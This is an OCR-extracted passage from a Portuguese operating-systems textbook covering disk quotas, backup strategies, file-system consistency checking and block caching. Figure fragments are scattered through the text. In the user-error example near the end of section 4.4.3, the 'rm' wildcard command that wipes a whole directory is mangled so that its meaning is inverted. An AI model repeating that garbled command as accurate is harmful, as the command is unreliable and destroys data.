verificados. O limite flexível pode ser excedido, mas o 
limite estrito não. Uma tentativa de adicionar blocos a 
um arquivo quando o limite de blocos estrito tiver sido 
alcançado resultará em um erro. Verificações análogas 
também existem para o número de arquivos a fim de evi- 
tar que algum usuário sobrecarregue todos os i-nodes. 

Quando um usuário tenta entrar no sistema, este 
examina o arquivo de cotas para ver se ele excedeu o 
limite flexível para o número de arquivos ou o núme- 
ro de blocos de disco. Se qualquer um dos limites foi 
violado, um aviso é exibido, e o contador de avisos res- 
tantes é reduzido para um. Se o contador chegar a zero, 
o usuário ignorou o aviso vezes demais, e não tem per- 
missão para entrar. Conseguir a autorização para entrar 
novamente exigirá alguma conversa com o administra- 
dor do sistema. 

Esse método tem a propriedade de que os usuários po- 
dem ir além de seus limites flexíveis durante uma sessão 
de uso, desde que removam o excesso antes de se desco- 
nectarem. Os limites estritos jamais podem ser excedidos. 
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Jel 8-9 As cotas são relacionadas aos usuários e monitoradas em uma tabela de cotas. 


Tabela de arquivos abertos 


Endereços em 
disco dos 
atributos 
Usuário = 8 
Ponteiro 

da cota 


4.4.2 Backups (cópias de segurança) do sistema 
de arquivos 


A destruição de um sistema de arquivos é quase sem- 
pre um desastre muito maior do que a destruição de um 
computador. Se um computador for destruído pelo fogo, 
por uma descarga elétrica ou uma xicara de café derru- 
bada no teclado, isso é irritante e custará dinheiro, mas 
geralmente uma máquina nova pode ser comprada com 
um mínimo de incômodo. Computadores pessoais ba- 
ratos podem ser substituídos na mesma hora, bastando 
uma ida à loja (menos nas universidades, onde emitir 
uma ordem de compra exige três comitês, cinco assina- 
turas e 90 dias). 

Se o sistema de arquivos de um computador esti- 
ver irrevogavelmente perdido, seja pelo hardware ou 
pelo software, restaurar todas as informações será difi- 
cil, exigirá tempo e, em muitos casos, será impossível. 
Para as pessoas cujos programas, documentos, registros 
tributários, arquivos de clientes, bancos de dados, pla- 
nos de marketing, ou outros dados estiverem perdidos 
para sempre as consequências podem ser catastróficas. 
Apesar de o sistema de arquivos não conseguir oferecer 
qualquer proteção contra a destruição física dos equi- 
pamentos e da mídia, ele pode ajudar a proteger as in- 
formações. A solução é bastante clara: fazer cópias de 
segurança (backups). Mas isso pode não ser tão simples 
quanto parece. Vamos examinar a questão. 

A maioria das pessoas não acredita que fazer backups 
dos seus arquivos valha o tempo e o esforço — até que 





Tabela de cotas 


Limite flexível de blocos 


Limite estrito de blocos 


nº atual de blocos 


nº de avisos restantes 


de uso de blocos Registro de 
— - cota do 
Limite flexível usuário 8 


de arquivos 


Limite estrito 
de arquivos 


nº atual de arquivos 


nº de avisos restantes 
de uso de arquivos 


Ld 


um belo dia seu disco morre abruptamente, momento 
que a maioria delas jamais esquecerá. As empresas, no 
entanto, compreendem (normalmente) bem o valor dos 
seus dados e costumam realizar um backup ao menos 
uma vez ao dia, muitas vezes em fita. As fitas modernas 
armazenam centenas de gigabytes e custam centavos 
por gigabyte. Não obstante isso, realizar backups não é 
algo tão trivial quanto parece, então examinaremos al- 
gumas das questões relacionadas a seguir. 

Backups para fita são geralmente feitos para lidar 
com um de dois problemas potenciais: 


1. Recuperação em caso de um desastre. 
2. Recuperação de uma bobagem feita. 


O primeiro problema diz respeito a fazer o compu- 
tador funcionar novamente após uma quebra de disco, 
fogo, enchente ou outra catástrofe natural. Na prática, 
essas coisas não acontecem com muita frequência, ra- 
zão pela qual muitas pessoas não se preocupam em fa- 
zer backups. Essas pessoas também tendem a não ter 
seguro contra incêndio em suas casas pela mesma razão. 

A segunda razão é que os usuários muitas vezes 
removem acidentalmente arquivos de que precisam 
mais tarde outra vez. Esse problema ocorre com tanta 
frequência que, quando um arquivo é “removido” no 
Windows, ele não é apagado de maneira alguma, mas 
simplesmente movido para um diretório especial, a ces- 
ta de reciclagem, de maneira que ele possa buscado e 
restaurado facilmente mais tarde. Backups levam esse 
princípio mais longe ainda e permitem que arquivos que 
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foram removidos há dias, mesmo semanas, sejam res- 
taurados de velhas fitas de backup. 

Fazer backup leva um longo tempo e ocupa um 
espaço significativo, portanto é importante fazê-lo de 
maneira eficiente e conveniente. Essas considerações 
levantam as questões a seguir. Primeiro, será que todo 
o sistema de arquivos deve ser copiado ou apenas parte 
dele? Em muitas instalações, os programas executáveis 
(binários) são mantidos em uma parte limitada da ár- 
vore do sistema de arquivos. Não é necessário realizar 
backup de todos esses arquivos se todos eles podem 
ser reinstalados a partir do site do fabricante ou de um 
DVD de instalação. Também, a maioria dos sistemas 
tem um diretório para arquivos temporários. Em geral 
não há uma razão para fazer um backup dele também. 
No UNIX, todos os arquivos especiais (dispositivos 
de E/S) são mantidos em um diretório /dev. Fazer um 
backup desse diretório não só é desnecessário, como é 
realmente perigoso, pois o programa de backup poderia 
ficar pendurado para sempre se ele tentasse ler cada um 
desses arquivos até terminar. Resumindo, normalmente 
é desejável fazer o backup apenas de diretórios especi- 
ficos e tudo neles em vez de todo o sistema de arquivos. 

Segundo, é um desperdício fazer o backup de ar- 
quivos que não mudaram desde o último backup, o que 
leva à ideia de cópias incrementais. A forma mais sim- 
ples de cópia incremental é realizar uma cópia (backup) 
completa periodicamente, digamos por semana ou por 
mês, e realizar uma cópia diária somente daqueles ar- 
quivos que foram modificados desde a última cópia 
completa. Melhor ainda é copiar apenas aqueles arqui- 
vos que foram modificados desde a última vez em que 
foram copiados. Embora esse esquema minimize o tem- 
po de cópia, ele torna a recuperação mais complicada, 
pois primeiro a cópia mais recente deve ser restaurada e 
depois todas as cópias incrementais têm de ser restaura- 
das na ordem inversa. Para facilitar a recuperação, mui- 
tas vezes são usados esquemas de cópias incrementais 
mais sofisticados. 

Terceiro, visto que quantidades imensas de dados 
geralmente são copiadas, pode ser desejável comprimir 
os dados antes de escrevê-los na fita. No entanto, com 
muitos algoritmos de compressão, um único defeito na 
fita de backup pode estragar o algoritmo e tornar um ar- 
quivo inteiro ou mesmo uma fita inteira ilegível. Desse 
modo, a decisão de comprimir os dados de backup deve 
ser cuidadosamente considerada. 

Quarto, é difícil realizar um backup em um siste- 
ma de arquivos ativo. Se os arquivos e diretórios estão 
sendo adicionados, removidos e modificados duran- 
te o processo de cópia, a cópia resultante pode ficar 


inconsistente. No entanto, como realizar uma cópia 
pode levar horas, talvez seja necessário deixar o sis- 
tema off-line por grande parte da noite para realizar o 
backup, algo que nem sempre é aceitável. Por essa ra- 
zão, algoritmos foram projetados para gerar fotografias 
(snapshots) rápidas do estado do sistema de arquivos 
copiando estruturas críticas de dados e então exigindo 
que nas mudanças futuras em arquivos e diretórios se- 
jam realizadas cópias dos blocos em vez de atualizá-los 
diretamente (HUTCHINSON et al., 1999). Dessa ma- 
neira, o sistema de arquivos é efetivamente congelado 
no momento do snapshot; portanto, pode ser copiado 
depois quando o usuário quiser. 

Quinto e último, fazer backups introduz muitos pro- 
blemas não técnicos na organização. O melhor sistema 
de segurança on-line no mundo pode ser inútil se o admi- 
nistrador do sistema mantiver todos os discos ou fitas de 
backup em seu gabinete e deixá-lo aberto e desguarne- 
cido sempre que for buscar um café no fim do corredor. 
Tudo o que um espião precisa fazer é aparecer por um 
segundo, colocar um disco ou fita minúsculos em seu 
bolso e cair fora lepidamente. Adeus, segurança. Tam- 
bém, realizar um backup diário tem pouco uso se o fogo 
que queimar os computadores também queimar todos 
os discos de backup. Por essa razão, discos de backup 
devem ser mantidos longe dos computadores, mas isso 
introduz mais riscos (pois agora dois locais precisam 
contar com segurança). Para uma discussão aprofunda- 
da dessas e de outras questões administrativas práticas, 
ver Nemeth et al. (2013). A seguir discutiremos apenas 
as questões técnicas envolvidas em realizar backups de 
sistemas de arquivos. 

Duas estratégias podem ser usadas para copiar um 
disco para um disco de backup: uma cópia física ou 
uma cópia lógica. Uma cópia física começa no bloco 
O do disco, escreve em ordem todos os blocos de dis- 
co no disco de saída, e para quando ele tiver copiado 
o último. Esse programa é tão simples que provavel- 
mente pode ser feito 100% livre de erros, algo que em 
geral não pode ser dito a respeito de qualquer outro 
programa útil. 

Mesmo assim, vale a pena fazer vários comentários 
a respeito da cópia física. Por um lado, não faz sentido 
fazer backup de blocos de disco que não estejam sendo 
usados. Se o programa de cópia puder obter acesso à es- 
trutura de dados dos blocos livres, ele pode evitar copiar 
blocos que não estejam sendo usados. No entanto, pular 
blocos que não estejam sendo usados exige escrever o 
número de cada bloco na frente dele (ou o equivalente), 
já que não é mais verdade que o bloco k no backup era 
o bloco k no disco. 


Uma segunda preocupação é copiar blocos defei- 
tuosos. É quase impossível manufaturar discos gran- 
des sem quaisquer defeitos. Alguns blocos defeituosos 
estão sempre presentes. Às vezes, quando é feita uma 
formatação de baixo nível, os blocos defeituosos são 
detectados, marcados como tal e substituídos por blocos 
de reserva guardados ao final de cada trilha para preci- 
samente esse tipo de emergência. Em muitos casos, o 
controlador de disco gerencia a substituição de blocos 
defeituosos de forma transparente sem que o sistema 
operacional nem fique sabendo a respeito. 

No entanto, às vezes os blocos passam a apresen- 
tar defeitos após a formatação, caso em que o sistema 
operacional eventualmente vai detectá-los. Em geral, 
ele soluciona o problema criando um “arquivo” consis- 
tindo em todos os blocos defeituosos — somente para 
certificar-se de que eles jamais apareçam como livres e 
sejam ocupados. Desnecessário dizer que esse arquivo 
é completamente ilegível. 

Se todos os blocos defeituosos forem remapeados 
pelo controlador do disco e escondidos do sistema ope- 
racional como descrito há pouco, a cópia física funcio- 
nará bem. Por outro lado, se eles forem visíveis para o 
sistema operacional e mantidos em um ou mais arqui- 
vos de blocos defeituosos ou mapas de bits, é absoluta- 
mente essencial que o programa de cópia física tenha 
acesso a essa informação e evite copiá-los para evitar 
erros de leitura de disco intermináveis enquanto tenta 
fazer o backup do arquivo de bloco defeituoso. 

Sistemas Windows têm arquivos de paginação e hi- 
bernação que não são necessários no caso de uma res- 
tauração e não devem ser copiados em primeiro lugar. 
Sistemas específicos talvez também tenham outros ar- 
quivos internos que não devem ser copiados, então o 
programa de backup precisa ter consciência deles. 

As principais vantagens da cópia física são a sim- 
plicidade e a grande velocidade (basicamente, ela pode 
ser executada na velocidade do disco). As principais 
desvantagens são a incapacidade de pular diretórios se- 
lecionados, realizar cópias incrementais e restaurar ar- 
quivos individuais mediante pedido. Por essas razões, a 
maioria das instalações faz cópias lógicas. 

Uma cópia lógica começa em um ou mais diretórios 
especificados e recursivamente copia todos os arquivos 
e diretórios encontrados ali que foram modificados des- 
de uma determinada data de base (por exemplo, o últi- 
mo backup para uma cópia incremental ou instalação 
de sistema para uma cópia completa). Assim, em uma 
cópia lógica, o disco da cópia recebe uma série de dire- 
tórios e arquivos cuidadosamente identificados, o que 
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torna fácil restaurar um arquivo ou diretório específico 
mediante pedido. 

Tendo em vista que a cópia lógica é a forma mais 
usual, vamos examinar um algoritmo comum em deta- 
lhe usando o exemplo da Figura 4.25 para nos orientar. 
A maioria dos sistemas UNIX usa esse algoritmo. Na 
figura vemos uma árvore com diretórios (quadrados) e 
arquivos (círculos). Os itens sombreados foram modifi- 
cados desde a data de base e desse modo precisam ser 
copiados. Os arquivos não sombreados não precisam 
ser copiados. 

Esse algoritmo também copia todos os diretórios 
(mesmo os inalterados) que ficam no caminho de um 
arquivo ou diretório modificado por duas razões. A pri- 
meira é tornar possível restaurar os arquivos e diretó- 
rios copiados para um sistema de arquivos novos em um 
computador diferente. Dessa maneira, os programas de 
cópia e restauração podem ser usados para transportar 
sistemas de arquivos inteiros entre computadores. 

A segunda razão para copiar diretórios inalterados 
que estejam acima de arquivos modificados é tornar 
possível restaurar de maneira incremental um único ar- 
quivo (possivelmente para recuperar alguma bobagem 
cometida). Suponha que uma cópia completa do sistema 
de arquivos seja feita no domingo à noite e uma cópia 
incremental seja feita segunda-feira à noite. Na terça- 
-feira o diretório /usr/jhs/proj/nr3 é removido, junto 
com todos os diretórios e arquivos sob ele. Na manhã 
ensolarada de quarta-feira suponha que o usuário quei- 
ra restaurar o arquivo /usr/jhs/proj/nr3/plans/summary. 
No entanto, não é possível apenas restaurar o arquivo 
summary porque não há lugar para colocá-lo. Os dire- 
tórios nr3 e plans devem ser restaurados primeiro. Para 
obter seus proprietários, modos, horários etc. corretos, 
esses diretórios precisam estar presentes no disco de có- 
pia mesmo que eles mesmos não tenham sido modifica- 
dos antes da cópia completa anterior. 

O algoritmo de cópia mantém um mapa de bits inde- 
xado pelo número do i-node com vários bits por i-node. 
Bits serão definidos como 1 ou 0 nesse mapa conforme 
o algoritmo é executado. O algoritmo opera em quatro 
fases. A fase 1 começa do diretório inicial (a raiz neste 
exemplo) e examina todas as entradas nele. Para cada 
arquivo modificado, seu i-node é marcado no mapa de 
bits. Cada diretório também é marcado (modificado ou 
não) e então inspecionado recursivamente. 

Ao fim da fase 1, todos os arquivos modificados e 
todos os diretórios foram marcados no mapa de bits, 
como mostrado (pelo sombreamento) na Figura 4.26(a). 
A fase 2 conceitualmente percorre a árvore de novo de 
maneira recursiva, desmarcando quaisquer diretórios 
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[FIGURA 4.25 | Um sistema de arquivos a ser copiado. Os quadrados são diretórios e os círculos, arquivos. Os itens sombreados foram 
modificados desde a última cópia. Cada diretório e arquivo estão identificados por seu número de i-node. 


1 |— Diretório-raiz 
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Diretório que 
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alterado 
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que não tenham arquivos ou diretórios modificados ne- 
les ou sob eles. Essa fase deixa o mapa de bits como 
mostrado na Figura 4.26(b). Observe que os diretórios 
10, 11, 14, 27, 29 e 30 estão agora desmarcados, pois 
não contêm nada modificado sob eles. Eles não serão 
copiados. Por outro lado, os diretórios 5 e 6 serão co- 
piados mesmo que não tenham sido modificados, pois 
serão necessários para restaurar as mudanças de hoje 
para uma máquina nova. Para fins de eficiência, as fa- 
ses 1 e 2 podem ser combinadas para percorrer a árvore 
uma única vez. 

Nesse ponto, sabe-se quais diretórios e arquivos 
precisam ser copiados. Esses são os arquivos que es- 
tão marcados na Figura 4.26(b). A fase 3 consiste em 
escanear os i-nodes em ordem numérica e copiar todos 
os diretórios que estão marcados para serem copiados. 
Esses são mostrados na Figura 4.26(c). Cada diretório 
é prefixado pelos atributos do diretório (proprietário, 
horários etc.), de maneira que eles possam ser restaura- 
dos. Por fim, na fase 4, os arquivos marcados na Figura 
4.26(d) também são copiados, mais uma vez prefixados 
por seus atributos. Isso completa a cópia. 


le) Mapas de bits usados pelo algoritmo da cópia lógica. 


Arquivo que 
foi alterado 
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Restaurar um sistema de arquivos a partir do disco 
de cópia é algo simples. Para começar, um sistema de 
arquivos vazio é criado no disco. Então a cópia com- 
pleta mais recente é restaurada. Já que os diretórios 
aparecem primeiro no disco de cópia, eles são todos 
restaurados antes, fornecendo um esqueleto ao sistema 
de arquivos. Então os arquivos em si são restaurados. 
Esse processo é repetido com a primeira cópia incre- 
mental feita após a cópia completa, depois a seguinte e 
assim por diante. 

Embora a cópia lógica seja simples, há algumas ques- 
tões complicadas. Por exemplo, já que a lista de blocos 
livres não é um arquivo, ele não é copiado e assim deve 
ser reconstruído desde o ponto de partida depois de to- 
das as cópias terem sido restauradas. Realizá-lo sempre 
é possível já que o conjunto de blocos livres é apenas o 
complemento do conjunto dos blocos contidos em todos 
os arquivos combinados. 

Outra questão são as ligações. Se um arquivo está 
ligado a dois ou mais diretórios, é importante que seja 
restaurado apenas uma vez e que todos os diretórios que 
supostamente estejam apontando para ele assim o façam. 
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Ainda outra questão é o fato de que os arquivos 
UNIX possam conter lacunas. É permitido abrir um ar- 
quivo, escrever alguns bytes, então deslocar para uma 
posição mais distante e escrever mais alguns bytes. 
Os blocos entre eles não fazem parte do arquivo e não 
devem ser copiados e restaurados. Arquivos contendo 
a imagem de processos terminados de modo anormal 
(core files) apresentam muitas vezes uma lacuna de 
centenas de megabytes entre os segmentos de dados e 
a pilha. Se não for tratado adequadamente, cada core 
file restaurado preencherá essa área com zeros e des- 
se modo terá o mesmo tamanho do espaço de endereço 
virtual (por exemplo, 2” bytes, ou pior ainda, 2º bytes). 

Por fim, arquivos especiais, chamados pipes, e ou- 
tros similares (qualquer coisa que não seja um arquivo 
real) jamais devem ser copiados, não importa em qual 
diretório eles possam ocorrer (eles não precisam es- 
tar confinados em /dev). Para mais informações sobre 
backups de sistemas de arquivos, ver Chervenak et al. 
(1998) e Zwicky (1991). 


4.4.3 Consistência do sistema de arquivos 


Outra área na qual a confiabilidade é um problema é 
a consistência do sistema de arquivos. Muitos sistemas 
de arquivos leem blocos, modificam-nos e só depois os 
escrevem. Se o sistema cair antes de todos os blocos 
modificados terem sido escritos, o sistema de arquivos 
pode ser deixado em um estado inconsistente. O proble- 
ma é especialmente crítico se alguns dos blocos que não 
foram escritos forem blocos de i-nodes, de diretórios ou 
blocos contendo a lista de blocos livres. 

Para lidar com sistemas de arquivos inconsistentes, 
a maioria dos programas tem um programa utilitário 
que confere a consistência do sistema de arquivos. Por 
exemplo, UNIX tem fsck; Windows tem sfc (e outros). 
Esse utilitário pode ser executado sempre que o sistema 
é iniciado, especialmente após uma queda. A descrição 
a seguir explica como o fsck funciona. Sfc é de certa 
maneira diferente, pois ele funciona em um sistema de 
arquivos distinto, mas o princípio geral de usar a redun- 
dância inerente do sistema de arquivos para repará-lo 
ainda é válido. Todos os verificadores conferem cada 
sistema de arquivos (partição do disco) independente- 
mente dos outros. 

Dois tipos de verificações de consistência podem 
ser feitos: blocos e arquivos. Para conferir a consistên- 
cia do bloco, o programa constrói duas tabelas, cada 
uma contendo um contador para cada bloco, inicial- 
mente contendo 0. Os contadores na primeira tabela 
monitoram quantas vezes cada bloco está presente em 
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um arquivo; os contadores na segunda tabela registram 
quantas vezes cada bloco está presente na lista de livres 
(ou o mapa de bits de blocos livres). 

O programa então lê todos os i-nodes usando um dis- 
positivo cru, que ignora a estrutura de arquivos e apenas 
retorna todos os blocos de disco começando em 0. A 
partir de um i-node, é possível construir uma lista de to- 
dos os números de blocos usados no arquivo correspon- 
dente. À medida que cada número de bloco é lido, seu 
contador na primeira tabela é incrementado. O progra- 
ma então examina a lista de livres ou mapa de bits para 
encontrar todos os blocos que não estão sendo usados. 
Cada ocorrência de um bloco na lista de livres resulta 
em seu contador na segunda tabela sendo incrementado. 

Se o sistema de arquivos for consistente, cada blo- 
co terá um 1 na primeira ou na segunda tabela, como 
ilustrado na Figura 4.27(a). No entanto, como conse- 
quência de uma queda no sistema, as tabelas podem 
ser parecidas com a Figura 4.27(b), na qual o bloco 
2 não ocorre em nenhuma tabela. Ele será reportado 
como um bloco desaparecido. Embora blocos desapa- 
recidos não causem nenhum prejuízo real, eles desper- 
diçam espaço e reduzem assim a capacidade do disco. 
A solução para os blocos desaparecidos é simples: o 
verificador do sistema de arquivos apenas os adiciona 
à lista de blocos livres. 

Outra situação que pode ocorrer é aquela da Figura 
4.27(c). Aqui vemos um bloco, número 4, que ocorre 
duas vezes na lista de livres. (Duplicatas podem ocorrer 
apenas se a lista de livres for realmente uma lista; com 
um mapa de bits isso é impossível.) A solução aqui tam- 
bém é simples: reconstruir a lista de livres. 

A pior coisa que pode ocorrer é o mesmo bloco de 
dados estar presente em dois ou mais arquivos, como 
mostrado na Figura 4.27(d) com o bloco 5. Se qualquer 
um desses arquivos for removido, o bloco 5 será colo- 
cado na lista de livres, levando a uma situação na qual 
o mesmo bloco estará ao mesmo tempo em uso e livre. 
Se ambos os arquivos forem removidos, o bloco será 
colocado na lista de livres duas vezes. 

A ação apropriada para o verificador de sistema de 
arquivos é alocar um bloco livre, copiar os conteúdos 
do bloco 5 nele e inserir a cópia em um dos arquivos. 
Dessa maneira, o conteúdo de informação dos arquivos 
ficará inalterado (embora quase certamente adulterado), 
mas a estrutura do sistema de arquivos ao menos ficará 
consistente. O erro deve ser reportado, a fim de permitir 
que o usuário inspecione o dano. 

Além de conferir para ver se cada bloco está con- 
tabilizado corretamente, o verificador do sistema de 
arquivos também confere o sistema de diretórios. Ele, 
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le TE PYA Estados do sistema de arquivos. (a) Consistente. (b) Bloco desaparecido. (c) Bloco duplicado na lista de livres. (d) Bloco 


de dados duplicados. 
Número do bloco 
01234567 8 9101112131415 
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(a) 


Número do bloco 
01234567 8 9101112131415 


Blocos em uso 


Numero do bloco 


0123456 7 8 9101112131415 
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Blocos em uso 
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(b) 


Numero do bloco 


0123456 7 8 9101112131415 
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também, usa uma tabela de contadores, mas esses são 
por arquivo, em vez de por bloco. Ele começa no dire- 
tório-raiz e recursivamente percorre a árvore, inspecio- 
nando cada diretório no sistema de arquivos. Para cada 
i-node em cada diretório, ele incrementa um contador 
para contar o uso do arquivo. Lembre-se de que por 
causa de ligações estritas, um arquivo pode aparecer 
em dois ou mais diretórios. Ligações simbólicas não 
contam e não fazem que o contador incremente para o 
arquivo-alvo. 

Quando o verificador tiver concluído, ele terá uma 
lista, indexada pelo número do i-node, dizendo quan- 
tos diretórios contém cada arquivo. Ele então compara 
esses números com as contagens de ligações armaze- 
nadas nos próprios i-nodes. Essas contagens começam 
em 1 quando um arquivo é criado e são incrementadas 
cada vez que uma ligação (estrita) é feita para o arqui- 
vo. Em um sistema de arquivos consistente, ambas as 
contagens concordarão. No entanto, dois tipos de erros 
podem ocorrer: a contagem de ligações no i-node pode 
ser alta demais ou baixa demais. 

Se a contagem de ligações for mais alta do que o nú- 
mero de entradas de diretório, então mesmo que todos 
os arquivos sejam removidos dos diretórios, a contagem 
ainda será diferente de zero e o i-node não será remo- 
vido. Esse erro não é sério, mas desperdiça espaço no 
disco com arquivos que não estão em diretório algum. 
Ele deve ser reparado atribuindo-se o valor correto à 
contagem de ligações no i-node. 

O outro erro é potencialmente catastrófico. Se duas 
entradas de diretório estão ligadas a um arquivo, mas 
os i-nodes dizem que há apenas uma, quando qualquer 
uma das entradas de diretório for removida, a contagem 
do i-node irá para zero. Quando uma contagem de i-no- 
de vai para zero, o sistema de arquivos a marca como 
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inutilizada e libera todos os seus blocos. Essa ação re- 
sultará em um dos diretórios agora apontando para um 
i-node não usado, cujos blocos logo podem ser atribu- 
ídos a outros arquivos. Outra vez, a solução é apenas 
forçar a contagem de ligações no i-node a assumir o 
número real de entradas de diretório. 

Essas duas operações, conferir os blocos e conferir 
os diretórios, muitas vezes são integradas por razões de 
eficiência (por exemplo, apenas uma verificação nos i- 
-nodes é necessária). Outras verificações também são 
possíveis. Por exemplo, diretórios têm um formato de- 
finido, com números de i-nodes e nomes em ASCII. Se 
um número de i-node é maior do que o número de i- 
-nodes no disco, o diretório foi danificado. 

Além disso, cada i-node tem um modo, alguns dos 
quais são legais, mas estranhos, como o 0007, que 
possibilita ao proprietário e ao seu grupo não terem 
acesso a nada, mas permite que pessoas de fora leiam, 
escrevam e executem o arquivo. Pode ser útil ao me- 
nos reportar arquivos que dão aos usuários de fora mais 
direitos do que ao proprietário. Diretórios com mais 
de, digamos, 1.000 entradas também são suspeitos. Ar- 
quivos localizados nos diretórios de usuários, mas que 
são de propriedade do superusuário e que tenham o bit 
SETUID em 1, são problemas de segurança potenciais 
porque tais arquivos adquirem os poderes do superusu- 
ário quando executados por qualquer usuário. Com um 
pouco de esforço, é possível montar uma lista bastante 
longa de situações tecnicamente legais, mas peculiares, 
que vale a pena relatar. 

Os parágrafos anteriores discutiram o problema de 
proteger o usuário contra quedas no sistema. Alguns sis- 
temas de arquivos também se preocupam em proteger 
o usuário contra si mesmo. Se o usuário quiser digitar 


* 


rm -.o 


para remover todos os arquivos terminando com .o (ar- 
quivos-objeto gerados pelo compilador), mas acidental- 
mente digita 


rm*.o 


(observe o espaço após o asterisco), rm removerá todos 
os arquivos no diretório atual e então reclamará que não 
pode encontrar .o. No Windows, os arquivos que são 
removidos são colocados na cesta de reciclagem (um 
diretório especial), do qual eles podem ser recuperados 
mais tarde se necessário. É claro, nenhum espaço é li- 
berado até que eles sejam realmente removidos desse 
diretório. 


4.4.4 Desempenho do sistema de arquivos 


O acesso ao disco é muito mais lento do que o aces- 
so à memória. Ler uma palavra de 32 bits de memória 
pode levar 10 ns. A leitura de um disco rígido pode che- 
gar a 100 MB/s, o que é quatro vezes mais lento por 
palavra de 32 bits, mas a isso têm de ser acrescentados 
5-10 ms para buscar a trilha e então esperar pelo setor 
desejado para chegar sob a cabeça de leitura. Se apenas 
uma única palavra for necessária, o acesso à memória 
será da ordem de um milhão de vezes mais rápido que 
o acesso ao disco. Como consequência dessa diferença 
em tempo de acesso, muitos sistemas de arquivos foram 
projetados com várias otimizações para melhorar o de- 
sempenho. Nesta seção cobriremos três delas. 


Cache de blocos 


A técnica mais comum usada para reduzir os aces- 
sos ao disco é a cache de blocos ou cache de buffer. 
(A palavra “cache” é pronunciada como se escreve e 
é derivada do verbo francês cacher, que significa “es- 
conder”.) Nesse contexto, uma cache é uma coleção de 
blocos que logicamente pertencem ao disco, mas estão 
sendo mantidas na memória por razões de segurança. 


(ele) sys: As estruturas de dados da cache de buffer. 


Tabela de Início (LRU) 
espalhamento 
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Vários algoritmos podem ser usados para gerenciar 
a cache, mas um comum é conferir todas as solicitações 
para ver se o bloco necessário está na cache. Se estiver, 
o pedido de leitura pode ser satisfeito sem acesso ao 
disco. Se o bloco não estiver, primeiro ele é lido na ca- 
che e então copiado para onde quer que seja necessário. 
Solicitações subsequentes para o mesmo bloco podem 
ser satisfeitas a partir da cache. 

A operação da cache está ilustrada na Figura 4.28. 
Como há muitos (seguidamente milhares) blocos na cache, 
alguma maneira é necessária para determinar rapidamente 
se um dado bloco está presente. A maneira usual é mapear 
o dispositivo e endereço de disco e olhar o resultado em 
uma tabela de espalhamento. Todos os blocos com o mes- 
mo valor de espalhamento são encadeados em uma lista de 
maneira que a cadeia de colisão possa ser seguida. 

Quando um bloco tem de ser carregado em uma ca- 
che cheia, alguns blocos têm de ser removidos (e rees- 
critos para o disco se eles foram modificados depois de 
trazidos para o disco). Essa situação é muito parecida 
com a paginação, e todos os algoritmos de substituição 
de páginas usuais descritos no Capítulo 3, como FIFO, 
segunda chance e LRU, são aplicáveis. Uma diferen- 
ça bem-vinda entre a paginação e a cache de blocos é 
que as referências de cache são relativamente raras, de 
maneira que é viável manter todos os blocos na ordem 
exata do LRU com listas encadeadas. 

Na Figura 4.28, vemos que além das colisões enca- 
deadas da tabela de espalhamento, há também uma lista 
bidirecional ligando todos os blocos na ordem de uso, 
com o menos recentemente usado na frente dessa lista e 
o mais recentemente usado no fim. Quando um bloco é 
referenciado, ele pode ser removido da sua posição na 
lista bidirecional e colocado no fim. Dessa maneira, a 
ordem do LRU exata pode ser mantida. 

Infelizmente, há um problema. Agora que temos 
uma situação na qual o LRU exato é possível, ele passa 
a ser indesejável. O problema tem a ver com as que- 
das no sistema e consistência do sistema de arquivos 


Fim (MRU) 
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discutidas na seção anterior. Se um bloco crítico, como 
um bloco do i-node, é lido na cache e modificado, mas 
não reescrito para o disco, uma queda deixará o sistema 
de arquivos em estado inconsistente. Se o bloco do i- 
-node for colocado no fim da cadeia do LRU, pode levar 
algum tempo até que ele chegue à frente e seja reescrito 
para o disco. 

Além disso, alguns blocos, como blocos de i-nodes, 
raramente são referenciados duas vezes dentro de um 
intervalo curto de tempo. Essas considerações levam a 
um esquema de LRU modificado, tomando dois fatores 
em consideração: 


1. É provável que o bloco seja necessário logo nova- 
mente? 

2. O bloco é essencial para a consistência do siste- 
ma de arquivos? 


Para ambas as questões, os blocos podem ser dividi- 
dos em categorias como blocos de i-nodes, indiretos, de 
diretórios, de dados totalmente preenchidos e de dados 
parcialmente preenchidos. Blocos que provavelmente 
não serão necessários logo de novo irão para a frente, 
em vez de para o fim da lista do LRU, de maneira que 
seus buffers serão reutilizados rapidamente. Blocos que 
talvez sejam necessários logo outra vez, como o blo- 
co parcialmente preenchido que está sendo escrito, irão 
para o fim da lista, de maneira que permanecerão por ali 
um longo tempo. 

A segunda questão é independente da primeira. Se 
o bloco for essencial para a consistência do sistema de 
arquivos (basicamente, tudo exceto blocos de dados) e 
foi modificado, ele deve ser escrito para o disco ime- 
diatamente, não importando em qual extremidade da 
lista LRU será inserido. Ao escrever blocos críticos 
rapidamente, reduzimos muito a probabilidade de que 
uma queda arruíne o sistema de arquivos. Embora um 
usuário possa ficar descontente se um de seus arquivos 
for arruinado em uma queda, é provável que ele fique 
muito mais descontente se todo o sistema de arquivos 
for perdido. 

Mesmo com essa medida para manter intacta a in- 
tegridade do sistema de arquivos, é indesejável manter 
blocos de dados na cache por tempo demais antes de 
serem escritos. Considere o drama de alguém que está 
usando um computador pessoal para escrever um livro. 
Mesmo que o nosso escritor periodicamente diga ao 
editor para escrever para o disco o arquivo que está sen- 
do editado, há uma boa chance de que tudo ainda esteja 
na cache e nada no disco. Se o sistema cair, a estrutura 
do sistema de arquivos não será corrompida, mas um 
dia inteiro de trabalho será perdido. 


Essa situação não precisa acontecer com muita fre- 
quência para que tenhamos um usuário descontente. 
Sistemas adotam duas abordagens para lidar com isso. 
A maneira UNIX é ter uma chamada de sistema, sync, 
que força todos os blocos modificados para o disco ime- 
diatamente. Quando o sistema é inicializado, um pro- 
grama, normalmente chamado update, é inicializado no 
segundo plano para adentrar um laço infinito que emi- 
te chamadas sync, dormindo por 30 s entre chamadas. 
Como consequência, não mais do que 30 s de trabalho 
são perdidos pela quebra. 

Embora o Windows tenha agora uma chamada de 
sistema equivalente a sync, chamada FlushFileBuffers, 
no passado ele não tinha. Em vez disso, ele tinha uma 
estratégia diferente que era, em alguns aspectos, melhor 
do que a abordagem do UNIX (e outros, pior). O que ele 
fazia era escrever cada bloco modificado para o disco 
tão logo ele fosse escrito para a cache. Caches nas quais 
todos os blocos modificados são escritos de volta para 
o disco imediatamente são chamadas de caches de es- 
crita direta (write-through caches). Elas exigem mais 
E/S de disco do que caches que não são de escrita direta. 

A diferença entre essas duas abordagens pode ser 
vista quando um programa escreve um bloco totalmen- 
te preenchido de 1 KB, um caractere por vez. O UNIX 
coletará todos os caracteres na cache e escreverá o blo- 
co uma vez a cada 30 s, ou sempre que o bloco for re- 
